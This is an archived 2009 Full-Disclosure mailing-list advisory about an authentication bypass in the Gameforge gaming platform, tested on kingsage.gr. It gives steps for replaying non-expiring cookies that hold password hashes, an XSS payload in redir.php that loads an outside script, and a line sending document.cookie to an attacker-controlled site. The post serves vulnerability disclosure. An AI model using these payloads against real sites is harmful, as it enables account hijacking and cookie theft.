[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] gameforge.de gaming platform (validated for:
From: mestre rigel <mestre.rigel () gmail ! com>
Date: 2009-09-30 7:28:09
Message-ID: 938f06e60909300028q612df2d4n35f9db011d5d89cf () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Dear all,
I'd like to inform you about a security vulnerability in gameforge.de gaming
platform.
This vulnerability is validated only for kingsage.gr (versions 0.1.17,
0.1.18 and 0.1.19 - latest) but might affect all games developed under the
specific gaming platform (e.g.: ikariam, gladiatus, katsuro, battleknight,
bitefight, etc.)
=========================== Authentication bypass using hashed values
====================
After the initial login into the game all following plain HTTP GET/POST
requests are similar to this:
GET http://s1.kingsage.gr/game.php?village=24482&s=build_main HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, application/x-ms-application,
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml,
application/x-silverlight, */*
Referer:
http://s1.kingsage.gr/game.php?village=24482&s=build_main&p=2141&build=iron
Accept-Language: el
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; .NET CLR
1.1.4322)
Host: s1.kingsage.gr
Cookie: game_hash=cce006dc722ff22ad8a8e5a13fd3c698;
SD_FRAMEWORK_SESSION=0b1f74bebf7875e96338e9d4c6e37d4e; game_user=some.user;
game_pass=347183427615221ca90w24db1039a8cc
Proxy-Connection: Keep-Alive
which, among others, include three critical elements:
village=24482 [The village number - can be found for any user from within
the game]
game_user=some.user [The users' username in plaintext]
game_pass=347183427615221ca90w24db1039a8cc [The md5 hash value of the users'
password]
Taking into account that this traffic, which is plain HTTP can be sniffed
and that the games' cookies do not expire, a malicious user - by obtaining
another users' cookies *once* - can bypass authentication and access the
application/game as another user *at any time*.
The steps are the following.
1. The malicious user uses his/her personal account to enter the game
2. The malicious user modifies any following request by deleting
SD_FRAMEWORK_SESSION and game_hash from the cookie and POSTS only the
village, game_user and game_pass values that he/she has obtained.
Using this approach a malicious user can access (at any time) the account of
another user without knowing his/her (plaintext) password.
=========================== Vulnerability Impact (Correlated with Cross Site
Scripting) =============
The existence of Cross Site Scripting at the gaming platform raises the
impact of the vulnerability:
As an example if malicious user [A] sends to user [B] a message like this:
[url]
http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kings \
agegr.js%3E%3C/SCRIPT%3E[/url]<http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E%5B/url%5D>
*From withing the games' messaging functionality*
User [A] is able to inject/include malicious javascript code [<SCRIPT
SRC=http://../maliciouscode.js></SCRIPT>] in order to steal the cookie -
which includes all sensitive information for the attack described in the
first part - of user [B]
(This can be accomplished using e.g.: document.location='
http://user_a_controlled_site?cookie='+document.cookie<http://user_a_controlled_site/?cookie=%27+document.cookie>;
in the maliciouscode.js)
Kind regards,
mestre.rigel
[Attachment #5 (text/html)]
<span style="font-family: tahoma,sans-serif;">Dear all,</span><br style="font-family: \
tahoma,sans-serif;"><br style="font-family: tahoma,sans-serif;"><span style="font-family: \
tahoma,sans-serif;">I'd like to inform you about a security vulnerability in <a \
href="http://gameforge.de/" target="_blank">gameforge.de</a> gaming platform. </span><br \
style="font-family: tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: tahoma,sans-serif;">This \
vulnerability is validated only for <a href="http://kingsage.gr/" \
target="_blank">kingsage.gr</a> (versions 0.1.17, 0.1.18 and 0.1.19 - latest) but might affect \
all games developed under the specific gaming platform</span> (e.g.: ikariam, gladiatus, \
katsuro, battleknight, bitefight, etc.)<br style="font-family: tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: \
tahoma,sans-serif;">=========================== Authentication bypass using hashed values \
====================</span><br style="font-family: tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: tahoma,sans-serif;">After \
the initial login into the game all following plain HTTP GET/POST requests are similar to \
this:</span><br style="font-family: tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: tahoma,sans-serif;">GET \
<a href="http://s1.kingsage.gr/game.php?village=24482&s=build_main" \
target="_blank">http://s1.kingsage.gr/game.php?village=24482&s=build_main</a> \
HTTP/1.1</span><br style="font-family: tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">Accept: image/gif,
image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, application/x-ms-application,
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, \
application/x-silverlight, */*</span><br style="font-family: tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">Referer: <a \
href="http://s1.kingsage.gr/game.php?village=24482&s=build_main&p=2141&build=iron" \
target="_blank">http://s1.kingsage.gr/game.php?village=24482&s=build_main&p=2141&build=iron</a></span><br \
style="font-family: tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">Accept-Language: el</span><br style="font-family: \
tahoma,sans-serif;"><span style="font-family: tahoma,sans-serif;">Accept-Encoding: gzip, \
deflate</span><br style="font-family: tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">User-Agent: Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET
CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; .NET CLR 1.1.4322)</span><br style="font-family: \
tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">Host: <a href="http://s1.kingsage.gr/" \
target="_blank">s1.kingsage.gr</a></span><br style="font-family: tahoma,sans-serif;"><span \
style="font-family: tahoma,sans-serif;">Cookie: game_hash=cce006dc722ff22ad8a8e5a13fd3c698; \
SD_FRAMEWORK_SESSION=0b1f74bebf7875e96338e9d4c6e37d4e; game_user=some.user; \
game_pass=347183427615221ca90w24db1039a8cc</span><br style="font-family: tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">Proxy-Connection: Keep-Alive</span><br \
style="font-family: tahoma,sans-serif;"><br style="font-family: tahoma,sans-serif;"><span \
style="font-family: tahoma,sans-serif;">which, among others, include three critical \
elements:</span><br style="font-family: tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: \
tahoma,sans-serif;">village=24482 [The village number - can be found for any user from within \
the game]</span><br style="font-family: tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">game_user=some.user [The users' username in \
plaintext]</span><br style="font-family: tahoma,sans-serif;"><span style="font-family: \
tahoma,sans-serif;">game_pass=347183427615221ca90w24db1039a8cc [The md5 hash value of the \
users' password]</span><br style="font-family: tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: \
tahoma,sans-serif;">Taking into account that this traffic, which is plain HTTP can be sniffed \
and that the games' cookies do not expire, a malicious user - by obtaining
another users' cookies <u>once</u> - can bypass authentication and access the \
application/game as another user <u>at any time</u>.</span><br style="font-family: \
tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: tahoma,sans-serif;">The \
steps are the following.</span><br style="font-family: tahoma,sans-serif;"><br \
style="font-family: tahoma,sans-serif;"><span style="font-family: tahoma,sans-serif;">1. The \
malicious user uses his/her personal account to enter the game</span><br style="font-family: \
tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">2. The malicious user
modifies any following request by deleting SD_FRAMEWORK_SESSION and
game_hash from the cookie and POSTS only the village, game_user and
game_pass values that he/she has obtained.</span><br style="font-family: tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: tahoma,sans-serif;">Using
this approach a malicious user can access (at any time) the account of
another user without knowing his/her (plaintext) password.</span><br style="font-family: \
tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: \
tahoma,sans-serif;">=========================== Vulnerability Impact (Correlated with Cross \
Site Scripting) =============</span><br style="font-family: tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: tahoma,sans-serif;">The \
existence of Cross Site Scripting at the gaming platform raises the impact of the \
vulnerability:</span><br style="font-family: tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: tahoma,sans-serif;">As an \
example if malicious user [A] sends to user [B] a message like this:</span><br \
style="font-family: tahoma,sans-serif;"><br style="font-family: tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">[url]<a \
href="http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E%5B/url%5D" \
target="_blank">http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E[/url]</a></span><br \
style="font-family: tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: \
tahoma,sans-serif;"><u>From withing the games' messaging functionality</u></span><br \
style="font-family: tahoma,sans-serif;"><br style="font-family: tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">User [A] is able to inject/include malicious \
javascript code [<SCRIPT SRC=http://../maliciouscode.js></SCRIPT>] in order to \
steal the cookie - which includes all sensitive information for the attack described in the \
first part - of user [B]</span><br>
<br>(This can be accomplished using e.g.: document.location='<a \
href="http://user_a_controlled_site/?cookie=%27+document.cookie" \
target="_blank">http://user_a_controlled_site?cookie='+document.cookie</a>; in the <span \
style="font-family: tahoma,sans-serif;">maliciouscode.js</span>)<br style="font-family: \
tahoma,sans-serif;">
<br style="font-family: tahoma,sans-serif;"><span style="font-family: tahoma,sans-serif;">Kind \
regards, </span><br style="font-family: tahoma,sans-serif;"><font color="#888888"><font \
color="#888888"><br style="font-family: tahoma,sans-serif;">
<span style="font-family: tahoma,sans-serif;">mestre.rigel</span></font></font>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic